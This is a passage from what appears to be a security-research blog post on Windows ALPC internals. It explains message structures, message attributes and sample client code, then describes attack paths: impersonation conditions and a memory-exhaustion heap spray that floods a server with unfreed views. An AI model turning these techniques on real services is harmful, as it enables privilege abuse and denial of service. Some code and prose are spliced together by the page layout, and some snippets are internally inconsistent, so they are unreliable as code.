communication port The server listens for and sends new messages to its connection port Both the client and the server can specify which message attributes (we’ll get to tht in a bit) they want to receive when listening for new messages … wait a minute… Why is the server sending/receiving data on the connection port instead of its communication port, since it has a dedicated communication port?… This was one of the many things that puzzled me on ALPC and instead of doing all the heavy lifting reversing work to figure that out myself, I cheated and reached out to Alex Ionescu and simply asked the expert. I put the answer in Appendix A at the end of this post, as I don’t want to drive too far away from the message flow at this point… sorry for the cliff hanger … Anyhow, looking back at the message flow from above, we can figure that client and server are using various functions calls to create ALPC ports and then sending and receiving messages through the single function NtAlpcSendWaitReceivePort . While this contains a fair amount of information about the message flow it’s important to always be aware that server and client do not have a direct peer-to-peer connection, but instead route all messages through the kernel, which is responsible for placing messages on message queues, notifying each party of received messages and other things like validating messages and message attributes. To put that in perspective I’ve added some kernel calls into this picture: Server process Client process Connection Port - Port name - Port Attributes - Object Attribute (e.g. SID) handle: hConnectionPort NtAlpcCreatePort Kernel AlpcpCreateConnectionPort NtAlpcSendWaitReceivPort hConnectionPort, msgReceiveBuffer, msgReceiveAttributes NtAlpcSendWaitReceivPort AlpcpReceiveMessage NtAlpcConnectPort handle: hCommunicationPort msgSendBuffer, msgReceiveAttributes NtAlpcConnectPort ... NtAlpcAcceptConnectPort hConnectionPort, msgSendBuffer, msgSendAttributes, boolAcceptOrDeny Communication Port - Port Attributes - Object Attribute (e.g. SID) NtAlpcSendWaitReceivPort hConnectionPort, msgSendBuffer, msgSendAttributes, msgReceiveBuffer, msgReceiveAttributes Communication Port - Port Attributes - Object Attribute (e.g. SID) AlpcpAcceptConnectPort handle: hConnectionPort NtAlpcSendWaitReceivPort hCommunicationPort, msgSendBuffer, msgSendAttributes, msgReceiveBuffer, msgReceiveAttributes AlpcpReceiveMessage AlpcpReceiveMessage AlpcpSendMessage NtAlpcSendWaitReceivPort AlpcpSendMessage ... I have to admit on a first glance this is diagram is not super intuitive, but I’ll promise things will get clearer on the way, bear with me. To get a more complete picture of what ALPC looks like under the hood, we need to dive a little deeper into the implementation bits of ALPC messages, which I’ll cover in the following section. ALPC Messaging Details Okay so first of all, let’s clarify the structure of an ALPC message. An ALPC message always consist of a, so called, PORT_HEADER or PORT_MESSAGE, followed by the actual message that you want to send, e.g. some text, binary content, or anything else. In plain old C++ we can define an ALPC message with the following two structs: typedef struct _ALPC_MESSAGE { PORT_MESSAGE PortHeader; BYTE PortMessage[100];     // using a byte array of size 100 to store my actual message } ALPC_MESSAGE, * PALPC_MESSAGE; typedef struct _PORT_MESSAGE { union { struct { USHORT DataLength; In order to send a message all we have to do is the following: USHORT TotalLength; } s1; ULONG Length; } u1; union { struct { USHORT Type; USHORT DataInfoOffset; } s2; ULONG ZeroInit; } u2; union { CLIENT_ID ClientId; double DoNotUseThisField; }; ULONG MessageId; union { SIZE_T ClientViewSize; ULONG CallbackId; }; } PORT_MESSAGE, * PPORT_MESSAGE; // specify the message struct and fill it with all 0's to get a clear start ALPC_MESSAGE pmSend, pmReceived; RtlSecureZeroMemory(&pmSend, sizeof(pmSend)); RtlSecureZeroMemory(&pmReceived, sizeof(pmReceived)); // getting a pointer to my payload (message) byte array LPVOID lpPortMessage = pmSend->PortMessage; LPCSTR lpMessage = "Hello World!"; int lMsgLen = strlen(lpMessage); // copying my message into the message byte array memmove(lpPortMessage, messageContent, lMsgLen); // specify the length of the message pMessage->PortHeader.u1.s1.DataLength = lMsgLen; // specify the total length of the ALPC message pMessage->PortHeader.u1.s1.TotalLength = sizeof(PORT_MESSAGE) + lMsgLen; // Send the ALPC message NTSTATUS lSuccess = NtAlpcSendWaitReceivePort(   hCommunicationPort, // the client's communication port handle   ALPC_MSGFLG_SYNC_REQUEST, // message flags: synchronous message (send & receive message)   (PPORT_MESSAGE)&pmSend, // our ALPC message   NULL,                   // sending message attributes: we don't need that in the first step   (PPORT_MESSAGE)&pmReceived, // ALPC message buffer to receive a message   &ulReceivedSize,       // SIZE_T ulReceivedSize; Size of the received message   NULL,                   // receiving message attributes: we don't need that in the first step   0                       // timeout parameter, we don't want to timeout ); This code snippet will send an ALPC message with a body of “Hello World!” to a server that we’ve connect to. We specified the message to be synchronous message with the ALPC_MSGFLG_SYNC_REQUEST flag, which means that this call will wait (block) until a message is received on the client’s communication port. Of course we do not have to wait until a new message comes in, but use the time until then for other tasks (remember ALPC was build to be asynchronous, fast and efficient). To facilitate that ALPC provides three different message types: Synchronous request: As mentioned above synchronous messages block until a new message comes in (as a logical result of that one has to specify a receiving ALPC message buffer when calling NtAlpcSendWaitReceivePort with a synchronous messages) Asynchronous request: Asynchronous messages send out your message, but not wait for or act on any received messages. Datagram requests: Datagram request are like UDP packets, they don’t expect a reply and therefore the kernel does not block on waiting for a received message when sending a datagram request. So basically you can choose to send a message that expects a reply or one that does not and when you chose the former you can furthermore chose to wait until the reply comes in or don’t wait and do something else with your valuable CPU time in the meantime. That leaves you with the question of how to receive a reply in case you chose this last option and not wait (asynchronous request) within the NtAlpcSendWaitReceivePort function call? Once again you have 3 options: You could use an ALPC completion list, in which case the kernel does not inform you (as the receiver) that new data has been received, but instead simply copies the data into your process memory. It’s up to you (as the receiver) to get aware of this new data being present. This could for example achieved by using a notification event that is shared between you and the ALPC server¹. Once the server signals the event, you know new data has arrived. ¹Taken from Windows Internals, Part 2, 7th Edition. You could use an I/O completion port, which is a documented synchronization facility. You can receive a kernel callback to get replies - but that is only allowed if your process lives in kernel land. As you have the option to not receive messages directly it is not unlikely that more than one message comes in and waits for being fetched. To handle multiple messages in different states ALPC uses queues to handle and manage high volumes of messages piling up for a server. There are five different queues for messages and to distinguish them I’ll quote directly from chapter 8 of Windows Internals, Part 2, 7th Edition (as there is no better way to put this with these few words): Main queue: A message has been sent, and the client is processing it. Pending queue: A message has been sent and the caller is waiting for a reply, but the reply has not yet been sent. Large message queue: A message has been sent, but the caller’s buffer was to small to receive it. The caller gets another chance to allocate a larger buffer and request the message payload again. Canceled queue: A message that was sent to the port but has since then been canceled. Direct queue: A message that was sent with a direct event attached. At this point I’m not going to dive any deeper into message synchronization options and the different queues - I’ve got to make a cut somewhere - however in case someone is interested in finding bugs in these code areas I can highly recommend a look into chapter 8 of the amazing Windows Internals, Part 2, 7th Edition. I learned a lot from this book and can’t praise it enough! Finally, concerning the messaging details of ALPC, there is a last thing that hasn’t been detailed yet, which is the question of how is a message transported from a client to a server. It has been mentioned what kind of messages can be send, how the structure of a message looks like, what mechanism exist to synchronize and stall messages, but it hasn’t been detailed so far how a message get’s from one process to the other. You’ve got two options for this: Double buffer mechanism: In this approach a message buffer is allocated in the sender’s and receiver’s (virtual) memory space and the message is copied from the sender’s (virtual) memory into the kernel’s (virtual) memory and from there into the receiver’s (virtual) memory. It’s called double buffer, because a buffer, containing the message, is allocated and copied twice (sender -> kernel & kernel -> receiver). Section object mechanism: Instead of allocating a buffer to store a message, client and server can also allocate a shared memory section, that can be accessed by both parties, map a view of that section - which basically means to reference a specific area of that allocated section - copy the message into the mapped view and finally send this view as a message attribute (discussed in the following chapter) to the receiver. The receiver can extract a pointer to the same view that the sender used through the view message attribute and read the data from this view. The main reason for using the ‘section object mechanism’ is to send large messages, as the length of messages send through the ‘double buffer mechanism’ have a hardcoded size limit of 65535 bytes. An error is thrown if this limit is exceeded in a message buffer. The function AlpcMaxAllowedMessageLength() can be used to get the maximum message buffer size, which might change in future versions of Windows. This ‘double buffer mechanism’ is what was used in the code snippet from above. Looking back a message buffer for the send and the received message has been implicitly allocated via the first three lines of code: This message buffer has then been passed to the kernel in the call to NtAlpcSendWaitReceivePort , which copies the sending buffer into the receiving buffer on the other side. We could also dig into the kernel to figure out how an ALPC message (send via message buffers) actually looks like. Reversing the NtAlpcSendWaitReceivePort leads us to the kernel function AlpcpReceiveMessage , which eventually calls - for our code path - into AlpcpReadMessageData , where the copying of the buffer happens. Side note: If you’re interested in all the reversing details I left out here check out my follow up post: Debugging and Reversing ALPC At the end of this road you’ll find a simple RtlCopyMemory call - which is just a macro for memcpy - that copies a bunch of bytes from one memory space into another - it’s not as fancy as one might have expected it, but that’s what it is ¯*(ツ)*/¯. ALPC_MESSAGE pmSend, pmReceived;               // these are the message buffers RtlSecureZeroMemory(&pmSend, sizeof(pmSend)); RtlSecureZeroMemory(&pmReceived, sizeof(pmReceived)); To see that in action I’ve put a breakpoint into the AlpcpReadMessageData function shown above for my ALPC server process. The breakpoint is triggered once my ALPC client connects and sends an initial message to the server. The message that the client sends is the: Hello Server . The annotated debug output is shown below: [Pseudo Signature] memcpy(PointerToDestination, PointerToSource, LengthToCopy) [Translated to calling convention] memcpy(@RCX, ,@RDX, ,R8) This memcpy call copies the client's message from kernel memory to server memory These debug screens show what an ALPC message send through a message buffer looks like…just bytes in a process memory. Also note that the above screens is a visual representation of the ‘double buffer mechanism’ in it’s 2nd buffer copy stage, where a message is copied from kernel memory space into the receiver’s process memory space. The copy action from sender to kernel space has not been tracked as the breakpoint was only set for the receiver process. ALPC Message Attributes Alright, there’s one last piece that needs to be detailed before putting it all together, which is ALPC message attributes. I’ve mentioned message attributes a few times before, so here is what that means. When sending and receiving messages, via NtAlpcSendWaitReceivePort , client and server can both specify a set of attributes that they would like to send and/or receive. These set of attributes that one wants to send and the set of attributes that one wants to receive are passed to NtAlpcSendWaitReceivePort in two extra parameters, shown below: The idea here is that as sender you can pass on additional information to a receiver and the receiver on the other end can specify what set of attributes he would like to get, meaning that not necessarily all extra information that was send is also exposed to the receiver. The following message attributes can be send and/or received: Security Attribute: The security attribute holds security context information, which for example can be used to impersonate the sender of a message (detailed in the Impersonation section). This information is controlled and validated by the kernel. The structure of this attribute is shown below: View Attribute: As described towards the end of the Messaging Details chapter, this attribute can be used to pass over a pointer to a shared memory section, which can be used by the receiving party to read data from this memory section. The structure of this attribute is shown below: Context Attribute: The context attribute stores pointers to user-specified context structures that have been assigned to a specific client (communication port) or to a specific message. The context structure can be any arbitrary structure, for example a unique number, and is meant to identify a client. The server can extract and reference the port structure to uniquely identify a client that send a message. An example of a port structure I used, can be found here. The kernel will set in the sequence number, message ID and callback ID to enable structured message handling (similar to TCP). This message attribute can always be extracted by the receiver of a message, the sender does not have to specify this and cannot prevent the receiver from accessing this. The structure of this attribute is shown below: typedef struct _ALPC_SECURITY_ATTR { ULONG Flags; PSECURITY_QUALITY_OF_SERVICE pQOS; HANDLE ContextHandle; } ALPC_SECURITY_ATTR, * PALPC_SECURITY_ATTR; typedef struct _ALPC_DATA_VIEW_ATTR { ULONG Flags; HANDLE SectionHandle; PVOID ViewBase; SIZE_T ViewSize; } ALPC_DATA_VIEW_ATTR, * PALPC_DATA_VIEW_ATTR; Handle Attribute: The handle attribute can be used to pass over a handle to a specific object, e.g. to a file. The receiver can use this handle to reference the object, e.g. in a call to ReadFile. The kernel will validate if the passed handle is valid and raise and error otherwise. The structure of this attribute is shown below: Token Attribute: The token attribute can be used to pass on limited information about the sender’s token. The structure of this attribute is shown below: Direct Attribute: The direct attribute can be used to associate a created event with a message. The receiver can retrieve the event created by the sender and signal it to let the sender know that the send message was received (especially useful for datagram requests). The structure of this attribute is shown below: Work-On-Behalf-Of Attribute: This attribute can be used to send the work ticket that is associated with the sender. I haven’t played around with this so I can’t go in any more detail. The structure of this attribute is shown below: typedef struct _ALPC_CONTEXT_ATTR { PVOID PortContext; PVOID MessageContext; ULONG Sequence; ULONG MessageId; ULONG CallbackId; } ALPC_CONTEXT_ATTR, * PALPC_CONTEXT_ATTR; typedef struct _ALPC_MESSAGE_HANDLE_INFORMATION { ULONG Index; ULONG Flags; ULONG Handle; ULONG ObjectType; ACCESS_MASK GrantedAccess; } ALPC_MESSAGE_HANDLE_INFORMATION, * PALPC_MESSAGE_HANDLE_INFORMATION; typedef struct _ALPC_TOKEN_ATTR { ULONGLONG TokenId; ULONGLONG AuthenticationId; ULONGLONG ModifiedId; } ALPC_TOKEN_ATTR, * PALPC_TOKEN_ATTR; typedef struct _ALPC_DIRECT_ATTR { HANDLE Event; } ALPC_DIRECT_ATTR, * PALPC_DIRECT_ATTR; typedef struct _ALPC_WORK_ON_BEHALF_ATTR { ULONGLONG Ticket; } ALPC_WORK_ON_BEHALF_ATTR, * PALPC_WORK_ON_BEHALF_ATTR; The message attributes, how these are initialized and send was another thing that puzzled me when coding a sample ALPC server and client. So you don’t crash with the same problems that I had here are secret I learned about ALPC message attributes: To get started one has to know that the structure for ALPC message attributes is the following: Looking at this I initially thought you call the function AlpcInitializeMessageAttribute give it a reference to the above structure and the flag for the message attribute you want to send (all attributes are referenced by a flag value, here’s the list from my code) and the kernel then sets it all up for you. You then put the referenced structure into NtAlpcSendWaitReceivePort, repeat the process for every message you want to send and be all done. That is not the case and seems to be wrong on multiple levels. Only after I found this twitter post from 2020 and rewatched Alex’s SyScan’14 talk once again (I re-watched this at least 20 times during my research) I came to what I currently believe is the right track. Let me first spot the errors in my initial believes before bundling the right course of actions: AlpcInitializeMessageAttribute doesn’t do shit for you, it really only clears the ValidAttributes flag and sets the AllocatedAttributes flag according to your specified message attributes (so no kernel magic filling in data at all). I’ll have to admit I spotted this early on from reverse engineering the function, but for some time I still hoped it would do some more as the name of the function was so promising. To actually setup a message attribute properly you have to allocate the corresponding message structure and place it in a buffer after the ALPC_MESSAGE_ATTRIBUTES structure. So this is similar to an ALPC_MESSAGE where the actual message needs to be placed in a buffer after the PORT_MESSAGE structure. It’s not the kernel that sets the ValidAttributes attribute for your ALPC_MESSAGE_ATTRIBUTES structure, you have to set this yourself. I figured this out by playing around with the structure and for some time I thought this was just a weird workaround, because why would I need to set the ValidAttributes field? As far as I’m concerned my attributes are always valid and shouldn’t it be the kernel’s task to check if they are valid. I took me another round of Alex’s SyScan’14 talk to understand that.. You don’t setup the message attributes for every call to NtAlpcSendWaitReceivePort, you set all the message attributes up once and use the ValidAttributes flag before calling NtAlpcSendWaitReceivePort to specify which of all your set up attributes is valid for this very message you are sending now. To bundle this into useful knowledge, here’s how sending message attributes does work (in my current understanding): First of all you have two buffers: A buffer for message attributes you want to receive (in my code named: MsgAttrReceived ) and a buffer for message attributes you want to send (in my code named: MsgAttrSend ). For the MsgAttrReceived buffer you just have to allocate a buffer that is large enough to hold the ALPC_MESSAGE_ATTRIBUTES structure plus all the message attributes that you want to receive. After allocating this buffer set the AllocatedAttributes attribute to the typedef struct _ALPC_MESSAGE_ATTRIBUTES { ULONG AllocatedAttributes; ULONG ValidAttributes; } ALPC_MESSAGE_ATTRIBUTES, * PALPC_MESSAGE_ATTRIBUTES; corresponding attribute(s) flag(s) value. This AllocatedAttributes value can be changed for every message you receive. For my sample server and client application I just want to always receive all attributes that the kernel could give me, therefore I set the buffer for the receiving attributes once at the beginning of my code as follows: [code] For the MsgAttrSend buffer two more steps are involved. You have to allocate a buffer that is large enough to hold ALPC_MESSAGE_ATTRIBUTES structure plus all the message attributes that you want to send (just as before). You have to set the AllocatedAttributes attribute (just as before), but then you also have to initialize the message attributes (meaning creating the necessary structures and fill those with valid values) that you want to send and then finally set the ValidAttributes attribute. In my code I wanted to send different attributes in different messages so here’s how I did that: pMsgAttrReceived = alloc_message_attribute(ALPC_MESSAGE_ATTRIBUTE_ALL); PALPC_MESSAGE_ATTRIBUTES alloc_message_attribute(ULONG ulAttributeFlags) { NTSTATUS lSuccess; PALPC_MESSAGE_ATTRIBUTES pAttributeBuffer; LPVOID lpBuffer; SIZE_T lpReqBufSize; SIZE_T ulAllocBufSize; ulAllocBufSize = AlpcGetHeaderSize(ulAttributeFlags); // required size for specified attribues lpBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ulAllocBufSize); if (GetLastError() != 0) { wprintf(L"[-] Failed to allocate memory for ALPC Message attributes.\n"); return NULL; } pAttributeBuffer = (PALPC_MESSAGE_ATTRIBUTES)lpBuffer; // using this function to properly set the 'AllocatedAttributes' attribute lSuccess = AlpcInitializeMessageAttribute( ulAttributeFlags, // attributes pAttributeBuffer, // pointer to attributes structure ulAllocBufSize, // buffer size &lpReqBufSize ); if (!NT_SUCCESS(lSuccess)) { return NULL; } else { //wprintf(L"Success.\n"); return pAttributeBuffer; } } [code] There is an additional catch with the sending attribute buffer: You don’t have to allocate or initialize the context attribute or the token attribute. The kernel will always prepare these attributes and the receiver can always request them. If you want to send multiple message attributes you will have a buffer that begins with the ALPC_MESSAGE_ATTRIBUTES followed by initialized structures for all the message attributes that you want. So how does the kernel know which attribute structure is which? The answer: You have to put the message attributes in a pre-defined order, which could be guessed from the value of their message attribute flags (from highest to lowest) or can also be found in the _KALPC_MESSAGE_ATTRIBUTES kernel structure: You might have noticed that the context and token attributes are not tracked in this structure and that is because the kernel will always provide these for any message, and hence does track them message independently. Once send, the kernel will validate all the message attributes, fill in values (for example sequence numbers) or clear attributes that are invalid before offering these to the receiver. Lastly the kernel will copy the attributes that the receiver specified as AllocatedAttributes into the receiver’s MsgAttrReceived buffer, from where they can be fetched by the receiver. All of the above might, hopefully, also get a little clearer if you go through my code and match these statements against where and how I used message attributes. So far we’ve introduced various components of ALPC to describe how the ALPC messaging system works and what an ALPC message looks like. Let me conclude this chapter by putting a few of these components into perspective. The above description and structure of an ALPC message describe what an ALPC message looks like to sender and receiver, but one should be aware that the kernel is adding a lot more information to this message - in fact it takes the provided parts and places them in a much bigger kernel message structure - as you can see below: // Allocate buffer and initialize the specified attributes pMsgAttrSend = setup_sample_message_attributes(hConnectionPort, hServerSection, ALPC_MESSAGE_SECURITY_ATTRIBUTE | ALPC_MESSAGE_VIEW_ATTRIBUTE | ALPC_MESSAGE_HANDLE_ATTRIBUTE); // ... // Before sending a message mark certain attributes as valid, in this case ALPC_MESSAGE_SECURITY_ATTRIBUTE pMsgAttrSend->ValidAttributes |= ALPC_MESSAGE_SECURITY_ATTRIBUTE lSuccess = NtAlpcSendWaitReceivePort(hConnectionPort, ...) //... So the message here is: We’ve made a good understanding, but there is a lot more under the hood that we’ve not touched. Putting the pieces together: A Sample Application I have coded a sample ALPC client and server application as a playground to understand the different ALPC components. Feel free to browse and change the code to get your own feeling for ALPC. A few fair warnings about this code: The code is not intended to scale/grow well. The code is intended to be easily readable and guide through the main steps of sending/receiving ALPC messages. This code is in absolutely no way even close to being performance, resource, or anything else optimized. It’s for learning. I did not bother to take any effort to free buffers, messages or any other resources (which comes with a direct attack path, as described in section Unfreed Message Objects). Although there aren’t to many files to go through, let me point out a few notable lines of code: You can find how I set up sample messages attributes here. You can find a call to NtAlpcSendWaitReceivePort that both sends and receives a message here. You can find ALPC port flags, message attribute flags, message and connection flags here. And then finally here is what it looks like: Attack Surface Before digging into the attack surface of ALPC communication channels, I’d like to point out an interesting conceptual weakness with ALPC communication that the below attack paths build on and that should be kept in mind to find further exploit potential. Looking back at the ALPC Message Flow section we can recall, that in order to allow for ALPC communication to occur a server has to open up an ALPC (connection) port, wait for incoming messages and then accept or decline these messages. Although an ALPC port is a securable kernel object and can as such be created with a Security Descriptor that defines who can access and connect to it, most of the time the creating ALPC server process can’t (or want) to limit access based on a callee’s SID. If you can’t (or want) limit access to your ALPC port by a SID, the only option you have is to allow Everyone to connect to your port and make a accept/deny decision after a client has connected and messaged you. That in turn means that a lot of built-in ALPC servers do allow Everyone to connect and send a message to a server. Even if the server rejects a client right away, sending an initial message and some message attributes along with that message, might be enough to exploit a vulnerability. Due to this communication architecture and the ubiquity of ALPC, exploiting ALPC is also an interesting vector to escape sandboxes. Identify Targets The first step in mapping the attack surface is to identify targets, which in our case are ALPC client or server processes. There are generally three routes that came to my mind of how to identify such processes: 1. Identify ALPC port objects and map those to the owning processes 2. Inspect processes and determine if ALPC is used within them 3. Use Event Tracing for Windows (ETW) to list ALPC events All of these ways could be interesting, so let’s have a look at them… Find ALPC port objects We’ve already seen the most straight forward way to identify ALPC port objects at the beginning of this post, which is to fire up WinObj and spot ALPC objects by the ‘Type’ column. WinObj can’t give us more details so we head over to a WinDbg kernel debugger to inspect this ALPC port object: In the above commands we used Windbg’s !object command to query the object manager for the named object in the specified path. This implicitly already told us that this ALPC port has to be an ALPC connection port, because communications ports are not named. In turn we can conclude that we can use WinObj only to find ALPC connection ports and through these only ALPC server processes. Speaking of server processes: As shown above, one can use WinDbg’s undocumented !alpc command to display information about the ALPC port that we just identified. The output includes - alongside with a lot of other useful information, the owning server process of the port, which in this case is svchost.exe. Now that we know the address of the ALPC Port object we can use the !alpc command once again to display the active connections for this ALPC connection port: Side note: The !alpc Windbg command is undocumented, but the outdated !lpc command, which existed in the LPC days, is documented here and has a timestamp from December 2021. This documentation page does mention that the !lpc command is outdated and that the !alpc command should be used instead, but the !alpc command syntax and options are completely different. But to be fair the !alpc command syntax is displayed in WinDbg if you enter any invalid !alpc command: Thanks to James Forshaw and his NtObjectManager in .NET we can also easily query the NtObjectManager in PowerShell to search for ALPC port objects, and even better James already provided the wrapper function for this via Get-AccessibleAlpcPort. Find ALPC used in processes As always there are various ways to find ALPC port usage in processes, here are a few that came to mind: Similar to approaches in previous posts (here) one could use the dumpbin.exe utility to list imported functions of executables and search therein for ALPC specific function calls. As the above approach works with executable files on disk, but not with running processes, one could transfer the method used by dumpbin.exe and parse the Import Address Table (IAT) of running processes to find ALPC specific function calls. One could attach to running processes, query the open handles for this process and filter for those handles that point to ALPC ports. Once dumpbin.exe is installed, which for examples comes with the Visual Studio C++ development suite, the following two PowerShell one-liners could be used to find .exe and .dll files that create or connec to an ALPC port: I did not code the 2nd option (parsing the IAT) - if you know a tool that does this let me know, but there is an easy, but very slow way to tackle option number 3 (find ALPC handles in processes) using the following WinDbg command: !handle 0 2 0 ALPC Port ## Get ALPC Server processes (those that create an ALPC port) Get-ChildItem -Path "C:\Windows\System32\" -Include ('*.exe', '*.dll') -Recurse - ErrorAction SilentlyContinue | % { $out=$(C:\"Program Files (x86)"\"Microsoft Visual Studio 14.0"\VC\bin\dumpbin.exe /IMPORTS:ntdll.dll $_.VersionInfo.FileName); If($out -like "*NtAlpcCreatePort*"){ Write-Host "[+] Executable creating ALPC Port: $($_.VersionInfo.FileName)"; Write-Output "[+] $($_.VersionInfo.FileName)`n`n $($out|%{"$_`n"})" | Out-File -FilePath NtAlpcCreatePort.txt -Append } } ## Get ALPC client processes (those that connect to an ALPC port) Get-ChildItem -Path "C:\Windows\System32\" -Include ('*.exe', '*.dll') -Recurse - ErrorAction SilentlyContinue | % { $out=$(C:\"Program Files (x86)"\"Microsoft Visual Studio 14.0"\VC\bin\dumpbin.exe /IMPORTS:ntdll.dll $_.VersionInfo.FileName); If($out -like "*NtAlpcConnectPor*"){ Write-Host "[+] Executable connecting to ALPC Port: $($_.VersionInfo.FileName)"; Write-Output " [+] $($_.VersionInfo.FileName)`n`n $($out|%{"$_`n"})" | Out-File -FilePath NtAlpcConnectPort.txt -Append } } Be aware that this is very slow and will probably take a few hours to complete (I stopped after 10 minutes and only got around 18 handles). But once again thanks to James Forshaw and his NtApiDotNet there is any easier way to code this yourself and speed up this process, plus we can also get some interesting ALPC stats… You can find that tool here Note that this program does not run in kernel land, so I’d expect better results with the WinDbg command, but it does its job to list some ALPC ports used by various processes. By iterating over all processes that we have access to, we can also calculate some basic stats about ALPC usage, as shown above. These numbers are not 100% accurate, but with - on average - around 14 ALPC communication port handles used per process we can definitely conclude that ALPC is used quite frequently within Windows. Once you identify a process that sounds like an interesting target WinDbg can be used again to dig deeper … Use Event Tracing For Windows Although ALPC is undocumented a few ALPCs events are exposed as Windows events that can be captured through Event Tracing for Windows (ETW). One of the tools that helps with ALPC events is ProcMonXv2 by zodiacon. After a few seconds of filtering for the five exposed ALPC events we get over 1000 events, another indication that ALPC is used quite frequently. But apart from that there is not much that ETW can offer in terms of insights into the ALPC communication channels, but anyhow, it did what it was intended to do: Identify ALPC targets. Impersonation and Non-Impersonation As with the previous post of the series (see here & here) one interesting attack vector is impersonation of another party. As last time, I’m not going to cover Impersonation again, but you’ll find all the explanation that you’ll need in the in the Impersonation section of the Named Pipe Post. For ALPC communication the impersonation routines are bound to messages, which means that both client and server (aka. each communicating party) can impersonate the user on the other side. However, in order to allow for impersonation the impersonated communication partner has to allow to for impersonation to happen AND the impersonating communication partner needs to hold the SeImpersonate privilege (it’s still a secured communication channel, right?)… Looking at the code there seem to be two options to fulfil the first condition, which is to allow being impersonated: The first option: Through the PortAttributes , e.g. like this: The second option: Through the ALPC_MESSAGE_SECURITY_ATTRIBUTE message attribute If you’re not super familiar with VC++/ALPC code, these snippets might not tell you anything, which is totally fine. The point here is: In theory there are two options to specify that you allow impersonation. However, there is a catch: If the server (the one with the connection port handle) wants to impersonate a client then impersonation is allowed if the client specified EITHER the first option OR the second (or both, but one option is sufficient). However if the client wants to impersonate the server, then the server has to provide the 2nd option. In other words: The server has to send the ALPC_MESSAGE_SECURITY_ATTRIBUTE to allow the client to impersonate the server. I’ve looked at both routes: A server impersonating a client and a client impersonating a server. My first path was finding clients attempting to connect to a server port that does not exist in order to check for impersonation conditions. I tried various methods, but so far I haven’t figured a great way to identify such clients. I managed to use breakpoints in the kernel to manually spot some cases, but so far couldn’t find any interesting ones that would allow for client impersonation. Below is an example of the “ApplicationFrameHost.exe” trying to connect to an ALPC port that does not exist, which I could catch with my sample server, however, the process does not allow impersonation (and the application runs as my current user)… Not a successful impersonation attempt, but at least it proves the idea. // QOS SecurityQos.ImpersonationLevel = SecurityImpersonation; SecurityQos.ContextTrackingMode = SECURITY_STATIC_TRACKING; SecurityQos.EffectiveOnly = 0; SecurityQos.Length = sizeof(SecurityQos); // ALPC Port Attributs PortAttributes.SecurityQos = SecurityQos; PortAttributes.Flags = ALPC_PORTFLG_ALLOWIMPERSONATION; pMsgAttrSend = setup_sample_message_attributes(hSrvCommPort, NULL, ALPC_MESSAGE_SECURITY_ATTRIBUTE); // setup security attribute pMsgAttrSend->ValidAttributes |= ALPC_MESSAGE_SECURITY_ATTRIBUTE; // specify it to be valid for the next message NtAlpcSendWaitReceivePort(...) // send the message Onto the other path: I located a bunch of ALPC connection ports using Get-AccessibleAlpcPort as shown previously and instructed my ALPC client to connect to these in order to verify whether these a) allow me to connect, b) send me any actual message back and c) send impersonation message attributes along with a message. For all of the ALPC connection ports I checked at best I got some short initialization message with an ALPC_MESSAGE_CONTEXT_ATTRIBUTE back, which is not useful for impersonation, but at least once again it showcases the idea here: Server Non-Impersonation In the RPC Part of the series I mentioned that it could also be interesting to connect to a server, that does use impersonation to change the security context of its thread to the security context of the calling client, but does not check if the impersonation succeeds or fails. In such a scenario the server might be tricked into executing tasks with its own - potentially elevated - security context. As detailed in the post about RPC, finding such occasions comes down to a case-by-base analysis of a specific ALPC server process you’re looking at. What you need for this is: A server process opening an ALPC port that your client can connect to The server has to accept connection messages and must attempt to impersonate the server The server must not check if the impersonation succeeds or fails (For relevant cases the server must run in a different security context then your client, aka. different user or different integrity level) As of now I can’t think of a good way of automating or semi-automating the process of finding such targets. The only option that comes to mind is finding ALPC connection ports and reversing the hosting processes. I’ll get this post updated if I stumble across anything interesting in this direction, but for the main part I wanted to re-iterate the attack path of failed impersonation attempts. Unfreed Message Objects As mentioned in the ALPC Message Attributes section there are several message attributes that a client or server can send along with a message. One of these is the ALPC_DATA_VIEW_ATTR attribute that can be used to send information about a mapped view to the other communication party. To recall: This could for example be used to store larger messages or data in a shared view and send a handle to that shared view to the other party instead of using the double-buffer messaging mechanism to copy data from one memory space into another. The interesting bit here is that a shared view (or section as its called in Windows) is mapped into the process space of the receiver when being referenced in an ALPC_DATA_VIEW_ATTR attribute. The receiver could then do something with this section (if they are aware of it being mapped), but in the end the receiver of the message has to ensure that a mapped view is freed from its own memory space, and this requires a certain number of steps, which might not be followed correctly. If a receiver fails to free a mapped view, e.g. because it never expected to receive a view in the first place, the sender can send more and more views with arbitrary data to fill the receiver’s memory space with views of arbitrary data, which comes down to a Heap Spray attack. I only learned about this ALPC attack vector by (once again) listening to Alex Ionescu’s SyScan ALPC Talk and I think there is no way to better phrase and showcase how this attack vector works then he does in this talk, so I’m not going to copy his content and words and just point you to minute 32 of his talk, where he starts to explain the attack. Also you want to see minute 53 of his talk for a demo of his heap spray attack. https://www.youtube.com/embed/UNpL5csYC1E?start=3180 The same logics applies with other ALPC message attributes, for example with handles that are send in ALPC_MESSAGE_HANDLE_INFORMATION via the ALPC handle attribute. Finding vulnerable targets for this type of attacks is - once again - a case-by-case investigative process, where one has to: Find processes (of interest) using ALPC communication Identify how a target process handles ALPC message attributes and especially if ALPC message attributes are freed Get creative about options to abuse non-freed resources, where the obvious PoC option would be to exhaust process memory space Of course, another valid approach would be to pick a target and just flood it with views (as an example) to check if the result is a lot of shared memory regions being allocated within the target’s address space. A useful tool to inspect the memory regions of a process is VMMap from the Sysinternals suite, which is what I’ve used as a PoC below. As an example I’ve flooded my ALPC sample server with 20kb views as shown below: This does work because I did not bother to make any effort to free any allocated attributes in my sample ALPC server. I’ve also randomly picked a few - like four or five - of Microsoft’s ALPC processes (that I identified using the above shown techniques), but the ones I picked do not seem to make the same mistake. Honestly, it might be valuable to check more processes for this, but as of know I have no use for this kind of bug other than crashing a process, which - if critical enough - might crash the OS as well (Denial of Service). Interesting Side note: In his talk Alex Ionescu mentions that the Windows Memory Manager allocates memory regions on 64kb boundaries, which means that whenever you allocate memory the Memory Manager places this memory at the start of the next available 64kb block. Which allows you, as an attacker, to create and map views of arbitrary size (preferably smaller than 64kb to make the memory exhaustion efficient) and the OS will map the view in the server’s memory and mark 64kb- YourViewSize as unusable memory, because it needs to align all memory allocation to 64kb boundaries. You want to see minute 54 of Alex’s talk to get a visual and verbal explanation of this effect. Raymond Chen explains the reasoning behind the 64kb granularity here. At the end of the day memory exhaustion attacks are of course not the only viable option to use a memory/heap spray primitive, which people smarter than me can turn into a exploit path… Conclousion ALPC is undocumented and quite complex, but as a motivational benefit: Vulnerabilities inside of 